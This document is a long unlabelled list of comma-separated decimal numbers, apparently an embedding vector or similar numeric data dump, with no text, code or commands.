0.001855444977991283, -0.0031883225310593843, 0.012356404215097427, -0.030242761597037315, -0.01670892722904682, -0.025453662499785423, -0.004871783312410116, -0.022768063470721245, -0.0183097030967474, 0.03135404363274574, 0.0006201353389769793, 0.028231868520379066, -0.04048243537545204, 0.021140828728675842, -0.025678565725684166, -0.03302096948027611, -0.010510880500078201, 0.014803871512413025, 0.002809626515954733, 0.004190461244434118, -0.01580931805074215, 0.0011187242344021797, -0.00908870343118906, 0.007759133819490671, -0.026670781895518303, -0.01398363895714283, 0.022146273404359818, 0.01575639843940735, 0.013732277788221836, 0.012038894928991795, -0.005662249401211739, 0.017132272943854332, 0.021789075806736946, 0.017965734004974365, -0.005235596094280481, 0.002227526158094406, -0.006237735040485859, 0.007448239251971245, 0.006118668708950281, -0.01309725921601057, 0.004835402127355337, -0.04426608979701996, -0.018997639417648315, 0.0009037439594976604, 0.021233433857560158, 0.004759332165122032, -0.005854077637195587, -0.029448987916111946, -0.018098030239343643, 0.010676250793039799, 0.010927611961960793, 0.040032632648944855, -0.004775869194418192, -0.023866117000579834, 0.02431592158973217, 0.02005600370466709, 0.034079331904649734, -0.035905010998249054, 0.0026707162614911795, -0.014499591663479805, 0.01133772823959589, 0.0114898681640625, 0.03217427805066109, 0.0032462019007653, -0.009353294968605042, -0.015227217227220535, 0.014076245948672295, -0.020280906930565834, -0.025559499859809875, -0.008976252749562263, -0.013480915687978268, 0.03026922047138214, -0.002432584296911955, 0.007547460962086916, 0.004670032765716314, -0.016219433397054672, 0.0015156108420342207, -0.010557183995842934, 0.021802306175231934, -0.00865874346345663, -0.002078693825751543, -0.010180141776800156, 0.012164575047791004, -0.012713601812720299, -0.00021704737446270883, -0.006945515982806683, 0.019804643467068672, 0.012105042114853859, -0.04844662919640541, -0.015081691555678844, -0.0016321962466463447, -0.015703480690717697, 0.010920996777713299, -0.0094260573387146, -0.013031111098825932, -0.015557955950498581, 0.00691244238987565, -0.0336824469268322, -0.03331201896071434, 0.0027037900872528553, 0.015544726513326168, 0.05709875747561455, 0.01726456917822361, -0.023694131523370743, -0.00857275165617466, -0.03143342211842537, -0.008711661212146282, 0.010755627416074276, -0.03421162813901901, 0.020399972796440125, -0.01926223188638687, -0.0027104050386697054, -0.012389477342367172, -0.009822944179177284, -0.01635172963142395, -0.024950940161943436, -0.012535003013908863, -0.0001889345730887726, -0.016986748203635216, -0.006637929007411003, 0.0173307154327631, -0.017132272943854332, 0.031406961381435394, 0.01623266376554966, -0.009598041884601116, -0.011212047189474106, -0.012508543208241463, -0.01422177068889141, -0.00308413989841938, -0.014459903351962566, -0.0043922122567892075, -0.026644323021173477, 0.0033222718629986048, -0.003578594420105219, 0.009856018237769604, 0.0031105990055948496, -0.010365355759859085, -0.011628778651356697, -0.0316186361014843, -0.010616716928780079, -0.0018306395504623652, -0.007289484608918428, 0.00939298328012228, -0.008003880269825459, -0.01194628793746233, 0.004312834702432156, -0.012561461888253689, 0.04169955477118492, 0.015915153548121452, 0.014750952832400799, -0.0001725009933579713, -0.019910478964447975, 0.0050437673926353455, 0.012620994821190834, 0.005205829627811909, 0.004382289946079254, -0.005275284871459007, -0.017357176169753075, 0.011628778651356697, 0.00954512320458889, 0.0026376424357295036, 0.016020990908145905, -0.0000841833752929233, 0.011145900003612041, 0.010894537903368473, 0.024818643927574158, 0.03855092078447342, -0.005189292598515749, 0.009406212717294693, 0.0044285934418439865, 0.01865367218852043, 0.006217890419065952, 0.013302316889166832, 0.004868476185947657, 0.017224879935383797, -0.01440698467195034, -0.006350186187773943, -0.023971952497959137, -0.012277026660740376, -0.011714770458638668, -0.003882874269038439, 0.01920931227505207, 0.014499591663479805, 0.018071571364998817, -0.0072497958317399025, -0.027252882719039917, 0.0061285910196602345, 0.007190262898802757, -0.005695322994142771, 0.019394526258111, -0.01398363895714283, 0.016100367531180382, -0.006565166171640158, 0.04169955477118492, 0.010358741506934166, -0.025149382650852203, -0.040270764380693436, 0.021312812343239784, -0.003429761854931712, -0.013394923880696297, -0.027464555576443672, 0.02206689678132534, 0.024646660313010216, 0.01267391350120306, 0.007183648180216551, -0.013467686250805855, -0.007560690399259329, -0.001438713981769979, -0.005166140850633383, 0.003955636639147997, 0.0038299560546875, -0.011741229332983494, -0.018203867599368095, -0.004660110455006361, -0.022331487387418747, -0.009650959633290768, -0.01356029324233532, -0.0031122525688260794, 0.011992591433227062, 0.012356404215097427, -0.026525257155299187, -0.04384274408221245, -0.0070248935371637344, 0.0001830432884162292, -0.02358829602599144, -0.017277797684073448, -0.007984035648405552, -0.014936166815459728, 0.011212047189474106, 0.0032230501528829336, 0.026247436180710793, 0.02467311918735504, 0.0013494145823642612, -0.01386457309126854, 0.004435208160430193, 0.04217581823468208, -0.020757170394062996, 0.01770114339888096, -0.006717306096106768, 0.03299450874328613, 0.025096464902162552, -0.013242783956229687, 0.005185985472053289, -0.0030146846547722816, 0.043366480618715286, 0.02096884325146675, 0.003863029880449176, -0.004494741093367338, 0.0009806407615542412, -0.015465348958969116, 0.009961854666471481, -0.022450553253293037, -0.011251736432313919, 0.019725264981389046, 0.009485590271651745, 0.016867682337760925, 0.010008158162236214, 0.012700372375547886, -0.0325976237654686, -0.0021580711472779512, -0.00398209597915411, 0.01834939233958721, 0.014010097831487656, -0.00442197872325778, 0.01587546616792679, -0.026604633778333664, -0.021961059421300888, 0.0023978566750884056, -0.004197075963020325, -0.0025814168620854616, -0.02303265407681465, 0.01968557760119438, 0.004339294042438269, -0.02328401617705822, -0.001875289366580546, -0.00221098936162889, 0.009062244556844234, -0.01386457309126854, 0.028284788131713867, 0.010418274439871311, -0.021259894594550133, -0.014274689368903637, 0.019963396713137627, 0.0335766077041626, -0.0019447444938123226, 0.03442329913377762, 0.01225056778639555, 0.009650959633290768, -0.012627610005438328, -0.02796727791428566, -0.011245121248066425, 0.005718474742025137, 0.008136175572872162, -0.013176635839045048, -0.022278569638729095, -0.02000308595597744, 0.0010930919088423252, 0.01398363895714283, -0.020439662039279938, -0.0012791325571015477, 0.02194783091545105, 0.01628558151423931, 0.001326262834481895, 0.0018041804432868958, 0.010537340305745602, -0.0020290829706937075, -0.0366194061934948, -0.009703878313302994, -0.0048552462831139565, 0.02364121377468109, 0.005374506581574678, -0.02717350423336029, -0.00799726601690054, -0.0079311178997159, 0.03654002770781517, 0.010722553357481956, -0.004762639757245779, 0.0007677275571040809, -0.0015850659692659974, 0.018931493163108826, 0.017859898507595062, -0.03550812229514122, -0.00708442647010088, 0.000027105083063361235, -0.0023780122864991426, 0.006793376058340073, -0.0032759683672338724, 0.06090886890888214, -0.007560690399259329, -0.010623332113027573, 0.014698035083711147, 0.009723722003400326, 0.02619451843202114, 0.025241989642381668, -0.009558352641761303, -0.010226445272564888, -0.0034793727099895477, -0.021365730091929436, -0.03873613476753235, 0.026287125423550606, -0.02656494453549385, -0.019540050998330116, 0.027623308822512627, -0.00027720051002688706, -0.012363018468022346, -0.011542785912752151, -0.00017808220582082868, 0.010735783725976944, -0.0006561031914316118, 0.004054858349263668, 0.018521375954151154, 0.0038134190253913403, 0.004722950980067253, -0.0020687715150415897, -0.004699799232184887, -0.007269639987498522, 0.04214936122298241, 0.028919806703925133, 0.009975084103643894, 0.02274160459637642, -0.013732277788221836, -0.005020616110414267, 0.002756708301603794, -0.0038729519583284855, -0.020267676562070847, -0.0007379610906355083, 0.01471126452088356, -0.0005854077753610909, 0.020505810156464577, -0.013050955720245838, 0.0183097030967474, -0.005920225754380226, 0.021326040849089622, -0.01969880610704422, 0.005652327090501785, -0.023508917540311813, 0.00951204914599657, 0.010854849591851234, -0.0019249001052230597, -0.028972724452614784, 0.00440544169396162, 0.01926223188638687, 0.011992591433227062, -0.0038398781325668097, -0.013315546326339245, 0.009981698356568813, 0.021180516108870506, -0.01234317384660244, -0.008162635378539562, -0.016867682337760925, -0.00661146966740489, 0.01909024640917778, 0.0012576344888657331, -0.036989834159612656, -0.016391417011618614, 0.021299581974744797, -0.0008954754448495805, -0.007719445042312145, 0.024210084229707718, 0.012058738619089127, 0.0007578054210171103, 0.005496880039572716, -0.0046931845135986805, 0.02644587866961956, 0.0051066079176962376, 0.011046677827835083, 0.006522170267999172, -0.00634026387706399, -0.012197649106383324, 0.0025748019106686115, 0.005513416603207588, -0.011165743693709373, -0.010801930911839008, -0.0034231471363455057, -0.025916697457432747, 0.01987079158425331, 0.025877008214592934, -0.00984940305352211, 0.008215553127229214, 0.01988402009010315, -0.013123718090355396, -0.01709258370101452, 0.018402310088276863, -0.00039275240851566195, -0.022212421521544456, 0.014539279974997044, -0.020757170394062996, 0.00012247673294041306, 0.0031420192681252956, -0.01878596656024456, -0.010398429818451405, 0.030004629865288734, 0.006148435175418854, -0.005906995851546526, 0.023998411372303963, -0.0013593366602435708, -0.00617158692330122, 0.006799990776926279, -0.006786761339753866, 0.0068330648355185986, -0.022516701370477676, -0.009750181809067726, 0.04463651776313782, -0.010127224028110504, 0.037968821823596954, 0.0016570016741752625, -0.015002314932644367, 0.030719025060534477, 0.02619451843202114, -0.0058639999479055405, -0.018375851213932037, -0.010484421625733376, -0.02323109656572342, -0.002331709023565054, -0.013368465006351471, 0.00006904173642396927, 0.027517473325133324, 0.006469252053648233, -0.006978590041399002, 0.005314973648637533, -0.022768063470721245, -0.023985182866454124, 0.01944744400680065, -0.0014932859921827912, -0.042757920920848846, -0.01987079158425331, 0.0048817056231200695, -0.0347672700881958, -0.022199193015694618, 0.006102132145315409, 0.023747049272060394, -0.02358829602599144, 0.00030365961720235646, 0.007190262898802757, 0.0042136129923164845, -0.01636495813727379, 0.009624500758945942, 0.03177738934755325, -0.0076665268279612064, -0.00633695675060153, -0.008619054220616817, 0.008923334069550037, 0.004028399474918842, -0.015557955950498581, -0.007937733083963394, -0.0009384715231135488, 0.0004419498145580292, -0.013758736662566662, -0.005936762318015099, -0.018084801733493805, -0.00279805064201355, 0.002072078874334693, -0.007884814403951168, -0.016378188505768776, 0.014076245948672295, -0.012455625459551811, 0.01015368290245533, 0.02620774693787098, 0.016431106254458427, -0.014274689368903637, -0.009346679784357548, 0.0009500473970547318, 0.01276651956140995, 0.02443498745560646, 0.009657574817538261, 0.010047846473753452, -0.020876236259937286, -0.008533062413334846, -0.043631069362163544, 0.012111657299101353, 0.012905430048704147, 0.019381297752261162, -0.024091018363833427, 0.015399200841784477, -0.01660308986902237, -0.012905430048704147, -0.0021498026326298714, -0.012806208804249763, -0.010352126322686672, 0.0004183846467640251, 0.009836173616349697, 0.00853967759758234, 0.00924084335565567, -0.002827817341312766, -0.015650562942028046, 0.02407778985798359, -0.004342601168900728, -0.012025664560496807, -0.02772914618253708, 0.012468854896724224, 0.009670804254710674, -0.0014965933514758945, 0.017595307901501656, -0.0074746981263160706, 0.0033867659512907267, -0.002452428685501218, -0.03217427805066109, 0.016431106254458427, -0.002192798536270857, 0.010087534785270691, -0.009406212717294693, -0.005910303443670273, -0.01834939233958721, 0.010133838281035423, -0.013507374562323093, 0.010663020424544811, -0.012667298316955566, -0.01995016820728779, -0.015081691555678844, -0.012515158392488956, -0.008182479068636894, 0.03325910121202469, 0.011231891810894012, -0.006224505137652159, 0.0017214957624673843, 0.0030990231316536665, 0.0079311178997159, 0.038762595504522324, 0.0029138093814253807, -0.01719842106103897, -0.008030339144170284, 0.021987520158290863, -0.016245892271399498, 0.016457565128803253, -0.028178950771689415, 0.02741163596510887, -0.0006904173642396927, 0.005010693799704313, -0.023905804380774498, 0.016126826405525208, -0.015372741967439651, 0.014724493958055973, -0.0052984366193413734, -0.00896963756531477, -0.015796087682247162, -0.00044939143117517233, 0.012124886736273766, -0.01841554045677185, -0.020029544830322266, 0.0015966418432071805, 0.01787312887609005, 0.014975855126976967, 0.0044385152868926525, 0.016880910843610764, -0.013970409519970417, 0.00398209597915411, 0.03156571835279465, -0.0029667275957763195, 0.04622406139969826, -0.006614777259528637, 0.01751592941582203, -0.007898043841123581, -0.01861398294568062, -0.006399796810001135, 0.005450576543807983, -0.01483033038675785, 0.016153285279870033, -0.005946684628725052, 0.0022010670509189367, 0.022053666412830353, 0.0031899763271212578, -0.007382091134786606, 0.004977619741111994, -0.010530725121498108, -0.00019771982624661177, 0.015240446664392948, -0.0016040834598243237, 0.0037439637817442417, 0.01543889008462429, 0.029925251379609108, -0.020836548879742622, 0.016073908656835556, -0.013891031965613365, -0.00532158836722374, 0.016523713245987892, -0.005877229385077953, 0.013050955720245838, -0.018256785348057747, -0.007408550474792719, -0.016801534220576286, 0.021048221737146378, 0.01987079158425331, -0.0002277963940287009, -0.0064924038015306, -0.01520075835287571, 0.011893369257450104, -0.00454435171559453, 0.0006548629608005285, -0.026154829189181328, 0.00576147111132741, -0.008493374101817608, 0.016695696860551834, 0.006654466036707163, -0.0029832646250724792, -0.014195311814546585, 0.01531982421875, 0.005672171246260405, 0.014724493958055973, -0.011258350685238838, -0.01471126452088356, -0.013289087451994419, 0.00017043386469595134, 0.010299207642674446, 0.010828389786183834, 0.0073887063190341, 0.004183846525847912, -0.014909707941114902, 0.028073115274310112, -0.011311269365251064, -0.017423322424292564, 0.006919057108461857, -0.0137984249740839, -0.011450178921222687, -0.02815249189734459, 0.009101933799684048, -0.003485987661406398, 0.002700482727959752, 0.010292593389749527, 0.00630718981847167, -0.011939672753214836, 0.01861398294568062, -0.005357969552278519, -0.004759332165122032, 0.028284788131713867, 0.005133067257702351, 0.017899587750434875, 0.01592838391661644, -0.007772363256663084, 0.007600379176437855, 0.0032065133564174175, -0.014499591663479805, -0.0025351133663207293, 0.015306594781577587, -0.005483650136739016, -0.0020373514853417873, 0.007825281471014023, -0.006750380154699087, -0.00881749764084816, 0.005377813708037138, 0.0033520383294671774, -0.012872355990111828, 0.007984035648405552, -0.001266729785129428, -0.008804268203675747, -0.014446672983467579, 0.00835446361452341, 0.0007437490276060998, 0.011423720046877861, -0.015002314932644367, -0.012938504107296467, 0.008136175572872162, -0.011787532828748226, 0.004971005022525787, 0.0016710581257939339, -0.009326836094260216, -0.023760279640555382, -0.010570414364337921, -0.032253652811050415, 0.013785195536911488, 0.022410865873098373, 0.033285558223724365, 0.01079531665891409, 0.010477807372808456, -0.006098824553191662, 0.011569245718419552, -0.01914316602051258, 0.017582077533006668, 0.009650959633290768, 0.0030758713837713003, -0.04024430364370346, -0.012455625459551811, 0.00951204914599657, -0.005821004044264555, 0.0048453244380652905, 0.010054461658000946, 0.0002585964393801987, -0.005014000926166773, 0.003697660518810153, -0.0005295955925248563, -0.017780521884560585, 0.006422948557883501, 0.005546490661799908, 0.013943950645625591, -0.0011195510160177946, -0.00632372684776783, -0.004183846525847912, 0.009201155044138432, 0.04042951762676239, -0.03325910121202469, 0.006151742767542601, 0.00043657529749907553, 0.010517495684325695, 0.007177033461630344, 0.0013080722419545054, -0.010828389786183834, -0.005252133123576641, 0.016140056774020195, -0.005589486565440893, 0.017105814069509506, 0.0023069034796208143, 0.000245366885792464, 0.001754569704644382, -0.010967300273478031, 0.007745903916656971, 0.02213304489850998, 0.005682093556970358, -0.017767291516065598, 0.01811126060783863, -0.014724493958055973, 0.02260930836200714, 0.015055232681334019, 0.002712058601900935, -0.005023923236876726, -0.004822172690182924, 0.024778954684734344, 0.0029865719843655825, -0.010319052264094353, 0.0018372543854638934, -0.0072233364917337894, -0.03185676783323288, -0.017185190692543983, 0.011648622341454029, 0.0203735139220953, 0.008215553127229214, 0.00589707400649786, -0.00037435503327287734, 0.015280134975910187, -0.031830307096242905, -0.0011724692303687334, 0.00008687062654644251, 0.013917490839958191, -0.013017881661653519, 0.018190637230873108, 0.01574316993355751, -0.0020853085443377495, 0.006062443368136883, -0.007864969782531261, 0.004885012749582529, 0.005840848200023174, -0.017529159784317017, 0.0046931845135986805, 0.006396489683538675, -0.015266905538737774, -0.0040978542529046535, -0.02365444414317608, -0.01697351783514023, -0.013474301435053349, -0.0018967873184010386, -0.013586752116680145, 0.019103476777672768, -0.0015271867159754038, -0.005480343010276556, -0.002973342314362526, 0.020889466628432274, -0.0008082431158982217, 0.00034624224645085633, -0.03892134875059128, -0.007620223332196474, 0.010920996777713299, -0.011635392904281616, -0.022159503772854805, 0.006631314288824797, -0.0244482159614563, -0.013163406401872635, 0.022635767236351967, -0.028787510469555855, 0.025122923776507378, -0.012693757191300392, -0.0028691596817225218, 0.004190461244434118, -0.016312040388584137, 0.03611668199300766, -0.012455625459551811, -0.004610499832779169, -0.00002800944639602676, 0.006237735040485859, -0.004967697896063328, 0.004815557971596718, -0.010226445272564888, 0.014274689368903637, 0.00035719797597266734, 0.019182853400707245, 0.007898043841123581, 0.001994355348870158, 0.0025053468998521566, 0.0023631290532648563, -0.01422177068889141, 0.001982779474928975, -0.002128304447978735, -0.004861861001700163, 0.010259519331157207, 0.029290232807397842, 0.013666129671037197, 0.01606067828834057, 0.011754458770155907, -0.0000243532322201645, 0.011595704592764378, -0.009412827901542187, -0.01489647850394249, -0.008361078798770905, 0.0010724207386374474, 0.029131479561328888, -0.001610698294825852, -0.000215393680264242, 0.011866910383105278, -0.007957576774060726, -0.003644742304459214, 0.0059665292501449585, 0.006866138894110918, -0.0035488279536366463, 0.009194539859890938, -0.005060304421931505, 0.008453684858977795, -0.0013485876843333244, 0.018587524071335793, -0.0030543734319508076, 0.024355608969926834, 0.007064581848680973, -0.010233060456812382, 0.019434215500950813, -0.005367891862988472, 0.009690648876130581, 0.01337507925927639, 0.018336161971092224, 0.006892597768455744, 0.03238594904541969, 0.025427203625440598, -0.013719047419726849, -0.013719047419726849, -0.01313694752752781, 0.0026905606500804424, 0.0025599186774343252, 0.01873304881155491, -0.0003501697792671621, 0.009498819708824158, -0.011450178921222687, -0.007818666286766529, -0.013176635839045048, 0.0018901725998148322, 0.003218088997527957, 0.021987520158290863, 0.0029353073332458735, -0.02462020143866539, 0.009604656137526035, 0.019394526258111, -0.002551650395616889, 0.0016528674168512225, 0.030507352203130722, 0.02280775085091591, 0.03167155385017395, -0.021233433857560158, 0.0006267501157708466, -0.007408550474792719, 0.012270411476492882, 0.005989680532366037, -0.022159503772854805, -0.023879345506429672, 0.010312438011169434, 0.0076532973907887936, -0.0099949287250638, -0.0015073423273861408, -0.007540845777839422, -0.0019645888824015856, 0.009194539859890938, 0.009062244556844234, 0.00036918724072165787, 0.00811633188277483, -0.005804467014968395, 0.01677507534623146, 0.022754833102226257, -0.0031155601609498262, -0.02084977738559246, 0.017674684524536133, -0.020558727905154228, -0.006631314288824797, -0.008440455421805382, -0.006952130701392889, -0.011271580122411251, -0.018878573551774025, 0.03823341056704521, -0.002889003837481141, 0.0022655611392110586, -0.016444336622953415, 0.02206689678132534, -0.015637332573533058, 0.003117213724181056, -0.0038398781325668097, -0.0004750236985273659, -0.016444336622953415, 0.0037274269852787256, -0.005840848200023174, -0.011271580122411251, 0.011410490609705448, 0.015425660647451878, -0.018071571364998817, 0.002961766440421343, 0.0005663902848027647, -0.0041276211850345135, -0.011959517374634743, -0.015147839672863483, 0.014433443546295166, -0.00781205203384161, -0.011556015349924564, 0.009584812447428703, 0.020320596173405647, 0.005255440250039101, -0.02103499136865139, -0.0013122063828632236, 0.01222410798072815, -0.004636958707123995, -0.008929949253797531, 0.007018278818577528, -0.007143959403038025, -0.006227812729775906, -0.009538508951663971, 0.02159063331782818, -0.012442396022379398, -0.02201397903263569, 0.0021084602922201157, 0.021974289789795876, 0.0030229531694203615, 0.02510969340801239, 0.013692588545382023, -0.001838908065110445, 0.00047709079808555543, -0.007659912109375, 0.009657574817538261, -0.008195708505809307, -0.005318280775099993, -0.011562630534172058, -0.0013907569227740169, 0.0008524794247932732, 0.014314377680420876, 0.01264083944261074, 0.004928009118884802, -0.021246664226055145, 0.006978590041399002, -0.0029915329068899155, -0.01559764426201582, -0.03016338311135769, -0.01176768820732832, 0.015452119521796703, 0.004951160866767168, 0.008890260942280293, -0.017066124826669693, -0.003545520594343543, 0.00735563226044178, -0.002731902990490198, 0.005903688725084066, 0.011628778651356697, -0.018270013853907585, -0.014803871512413025, 0.0018769430462270975, -0.001590853906236589, 0.024593740701675415, 0.00869181752204895, 0.026247436180710793, 0.0038762593176215887, -0.022106586024165154, -0.03177738934755325, 0.025427203625440598, -0.01106652244925499, -0.019592970609664917, 0.010028001852333546, 0.02096884325146675, 0.022754833102226257, 0.015028773806989193, -0.011780918575823307, -0.011562630534172058, 0.014115934260189533, 0.01276651956140995, 0.0005953299696557224, 0.0059003811329603195, 0.0034595285542309284, -0.007110885344445705, 0.02796727791428566, 0.0026541792321950197, -0.0028906576335430145, -0.004676647484302521, -0.013785195536911488, 0.0138248847797513, 0.0009591426933184266, 0.008552907034754753, 0.01946067437529564, 0.018706589937210083, -0.0011567592155188322, 0.021418647840619087, 0.017978964373469353, -0.015266905538737774, 0.010299207642674446, -0.021537713706493378, -0.0076665268279612064, 0.0023019425570964813, 0.010292593389749527, 0.010246289893984795, -0.030136924237012863, -0.021537713706493378, 0.012759905308485031, -0.020889466628432274, -0.03852446377277374, 0.008599210530519485, 0.011972746811807156, -0.024408528581261635, -0.0004919740604236722, 0.000909531838260591, 0.008076642639935017, 0.0028476614970713854, 0.009763411246240139, 0.01179414801299572, 0.008208938874304295, 0.015796087682247162, -0.0025615724734961987, -0.00369435315951705, 0.012151345610618591, -0.006426256150007248, -0.004822172690182924, -0.01027274876832962, -0.006938901264220476, 0.004233457613736391, 0.015518267638981342, -0.015213987790048122, 0.01599453203380108, -0.027067668735980988, 0.0023085572756826878, 0.0039854031056165695, 0.021722927689552307, -0.0016727118054404855, -0.008195708505809307, -0.0059764510951936245, -0.029872333630919456, 0.008771194145083427, 0.02201397903263569, -0.006297267973423004, 0.043366480618715286, -0.014698035083711147, 0.023548606783151627, -0.009485590271651745, -0.007851740345358849, -0.00009172835416393355, 0.02791436016559601, 0.0072233364917337894, -0.0005626694764941931, 0.02389257587492466, -0.025202300399541855, -0.014301148243248463, 0.00013343246246222407, -0.005053689703345299, -0.009280532598495483, -0.014208541251718998, 0.00884395744651556, 0.010087534785270691, -0.03288867324590683, -0.0002492944186087698, 0.004243379458785057, 0.0047031063586473465, -0.006019447464495897, 0.009763411246240139, 0.01811126060783863, 0.006098824553191662, 0.02467311918735504, -0.00705135241150856, 0.024898020550608635, -0.0017694529378786683, -0.021365730091929436, 0.020902695134282112, 0.027517473325133324, 0.015769628807902336, -0.01003461703658104, 0.026948602870106697, -0.013421382755041122, -0.010080920532345772, -0.006585010793060064, 0.010801930911839008, -0.002483848948031664, 0.0250435471534729, 0.010808546096086502, -0.006813220679759979, -0.011648622341454029, -0.0007032335270196199, 0.004584040492773056, 0.011734615080058575, -0.0017694529378786683, 0.00515291141346097, -0.0030461049173027277, 0.008328004740178585, -0.03667232394218445, -0.003853107802569866, 0.016272351145744324, -0.006178202107548714, 0.005778007674962282, -0.004613806959241629, 0.007917888462543488, -0.01701320707798004, 0.00004134235859964974, 0.011390645988285542, 0.0010062729706987739, -0.020770400762557983, -0.003806804306805134, 0.022344717755913734, 0.0009029170614667237, 0.009836173616349697, -0.020757170394062996, -0.00912177748978138, -0.024342380464076996, -0.005027230829000473, -0.006866138894110918, -0.018759507685899734, -0.002503693103790283, -0.012012435123324394, -0.017185190692543983, 0.008380922488868237, -0.0055597200989723206, 0.012998037040233612, -0.017978964373469353, -0.015108151361346245, -0.004646881017833948, 0.012025664560496807, 0.006978590041399002, 0.008738121017813683, 0.014142394065856934, 0.01318986527621746, -0.005354661960154772, -0.018931493163108826, -0.018031882122159004, -0.0066842325031757355, 0.010378585197031498, -0.0023697440046817064, -0.03635481372475624, 0.010517495684325695, 0.005672171246260405, 0.011026833206415176, 0.02127312310039997, 0.001310552703216672, -0.004395519383251667, 0.013811654411256313, 0.011099596507847309, 0.006254271604120731, -0.029713578522205353, -0.007044737692922354, 0.011694925837218761, -0.00031688917079009116, -0.006892597768455744, -0.006059135776013136, 0.015346283093094826, -0.00020588493498507887, 0.03045443445444107, -0.0011484907008707523, 0.0068727536126971245, -0.024792185053229332, 0.025400744751095772, -0.010107379406690598, -0.0038034969475120306, 0.014949396252632141, 0.015941612422466278, 0.00604921393096447, -0.0003098609740845859, 0.006178202107548714, 0.003074217587709427, -0.00046344782458618283, -0.011046677827835083, -0.01039181463420391, -0.012290256097912788, 0.016272351145744324, 0.012005820870399475, 0.014962625689804554, 0.0015801049303263426, 0.0147774126380682, -0.010861463844776154, 0.0034826803021132946, -0.023760279640555382, -0.011073136702179909, 0.009584812447428703, 0.005142989102751017, -0.00036484631709754467, -0.015452119521796703, -0.00022159503714647144, 0.004726258106529713, 0.018997639417648315, 0.00693228654563427, -0.015147839672863483, 0.0015329746529459953, -0.02237117663025856, -0.00784512609243393, 0.03799527883529663, -0.0009128392557613552, 0.007838510908186436, 0.005668864119797945, -0.0249906275421381, 0.009717107750475407, 0.009776640683412552, -0.02394549362361431, -0.015491807833313942, -0.010173527523875237, -0.0036248979158699512, 0.03950344771146774, -0.007461468689143658, -0.005500187166035175, -0.023694131523370743, -0.002953497925773263, -0.0049941567704081535, 0.009703878313302994, -0.01995016820728779, -0.012806208804249763, 0.007302714046090841, -0.0045906552113592625, 0.0034926023799926043, -0.0038200337439775467, 0.011754458770155907, -0.00012847137986682355, -0.0011708155507221818, 0.007957576774060726, -0.015901925042271614, 0.008791038766503334, 0.016523713245987892, -0.01866690069437027, 0.014843559823930264, -0.0072233364917337894, -0.012045509181916714, 0.008671972900629044, -0.013269242830574512, 0.0029187705367803574, -0.005123144946992397, 0.0030709102284163237, -0.024845102801918983, 0.005149603821337223, -0.008228782564401627, 0.004296297673135996, -0.014909707941114902, -0.002007584786042571, -0.020558727905154228, -0.000015619660189258866, 0.009783255867660046, 0.007296099327504635, -0.023429540917277336, 0.027861442416906357, 0.011040063574910164, -0.011212047189474106, -0.015253676101565361, -0.020386742427945137, -0.032200735062360764, 0.003767115529626608, 0.00854629185050726, 0.006634621415287256, 0.018336161971092224, -0.029713578522205353, 0.0024507748894393444, -0.006181509234011173, 0.010596873238682747, -0.017119042575359344, -0.007011663634330034, -0.019963396713137627, -0.012839282862842083, 0.01252838782966137, 0.003337155096232891, 0.001962935086339712, -0.0015974687412381172, 0.021484795957803726, -0.001061671762727201, -0.0033966880291700363, 0.005063612014055252, -0.007726059760898352, -0.012759905308485031, -0.015147839672863483, 0.022596077993512154, -0.0043525234796106815, -0.013666129671037197, 0.002464004559442401, 0.00250038574449718, -0.004517892841249704, 0.013626441359519958, -0.03773069009184837, -0.005202522035688162, -0.003345423610880971, -0.010504266247153282, 0.0017463011899963021, -0.0011914867209270597, 0.012587920762598515, 0.008705046959221363, -0.010008158162236214, -0.007752518635243177, -0.008043569512665272, -0.02796727791428566, 0.006561859045177698, -0.001994355348870158, -0.0066941543482244015, 0.005295129027217627, 0.007970806211233139, -0.051833394914865494, 0.009975084103643894, 0.021127598360180855, 0.03185676783323288, 0.004015169572085142, 0.033841200172901154, 0.0015048618661239743, 0.002741825068369508, -0.003103984287008643, -0.011251736432313919, -0.007329172920435667, -0.0011451833415776491, 0.027993736788630486, -0.004279760643839836, -0.0033768436405807734, -0.002832778263837099, -0.021259894594550133, 0.017648225650191307, 0.004587348084896803, 0.023866117000579834, -0.009293762035667896, -0.00930699147284031, 0.024104248732328415, 0.021511254832148552, 0.002897272352129221, 0.025638876482844353, -0.008731505833566189, -0.005414194893091917, -0.0027104050386697054, 0.011298038996756077, -0.001298150047659874, 0.006965360604226589, 0.001169988769106567, 0.018455227836966515, 0.0009285493288189173, -0.004068087786436081, -0.00367781613022089, -0.015782859176397324, -0.0011848720023408532, -0.019606199115514755, 0.005004079081118107, 0.00019802989845629781, -0.010418274439871311, -0.006766917183995247, 0.029025642201304436, -0.007864969782531261, 0.02815249189734459, -0.0015478578861802816, 0.010583643801510334, -0.011952902190387249, 0.012237337417900562, 0.01471126452088356, 0.0011650276137515903, -0.0026376424357295036, 0.003714197315275669, -0.003261085133999586, 0.016933830454945564, -0.000937644683290273, 0.008096487261354923, -0.0094260573387146, 0.004071395378559828, -0.00006351219781208783, 0.0037968819960951805, 0.019619429484009743, 0.012204264290630817, 0.028417082503437996, -0.0028063191566616297, -0.0002947710163425654, 0.03397349640727043, 0.01957974024116993, -0.01447313278913498, -0.01416885294020176, 0.005529953632503748, -0.007415165193378925, 0.009459131397306919, 0.003565364982932806, -0.02730580046772957, -0.003348730970174074, 0.022701915353536606, 0.018812425434589386, -0.008619054220616817, -0.0002691387489903718, 0.006207968574017286, 0.003052719635888934, -0.017793750390410423, 0.008804268203675747, 0.02419685572385788, -0.01489647850394249, 0.01410270482301712, -0.015068462118506432, 0.013064185157418251, 0.00720349233597517, 0.011258350685238838, 0.0018802504055202007, 0.019857561215758324, -0.029634201899170876, -0.014142394065856934, -0.03130112588405609, -0.0009806407615542412, 0.021180516108870506, -0.005973143968731165, -0.005354661960154772, -0.017555618658661842, -0.01606067828834057, 0.01191982813179493, -0.013031111098825932, 0.01768791489303112, 0.006938901264220476, -0.0008392498712055385, 0.00046303440467454493, -0.00647255964577198, 0.01926223188638687, 0.010980529710650444, 0.012316714972257614, 0.0004531122394837439, 0.015782859176397324, -0.015055232681334019, 0.0019877406302839518, -0.006482481490820646, 0.0076532973907887936, 0.014737723395228386, 0.02364121377468109, 0.004365752916783094, -0.006528784986585379, -0.010636561550199986, -0.0005457191145978868, 0.010821775533258915, 0.0024970783852040768, 0.0016487331595271826, -0.006022754590958357, 0.005817696452140808, -0.028046654537320137, 0.007534231059253216, -0.01580931805074215, -0.01520075835287571, 0.0013510682620108128, 0.027940819039940834, 0.00110218720510602, 0.0005477862432599068, -0.018071571364998817, 0.012812823057174683, 0.03725442662835121, -0.008731505833566189, 0.01520075835287571, 0.00866535771638155, -0.032068438827991486, 0.017489470541477203, 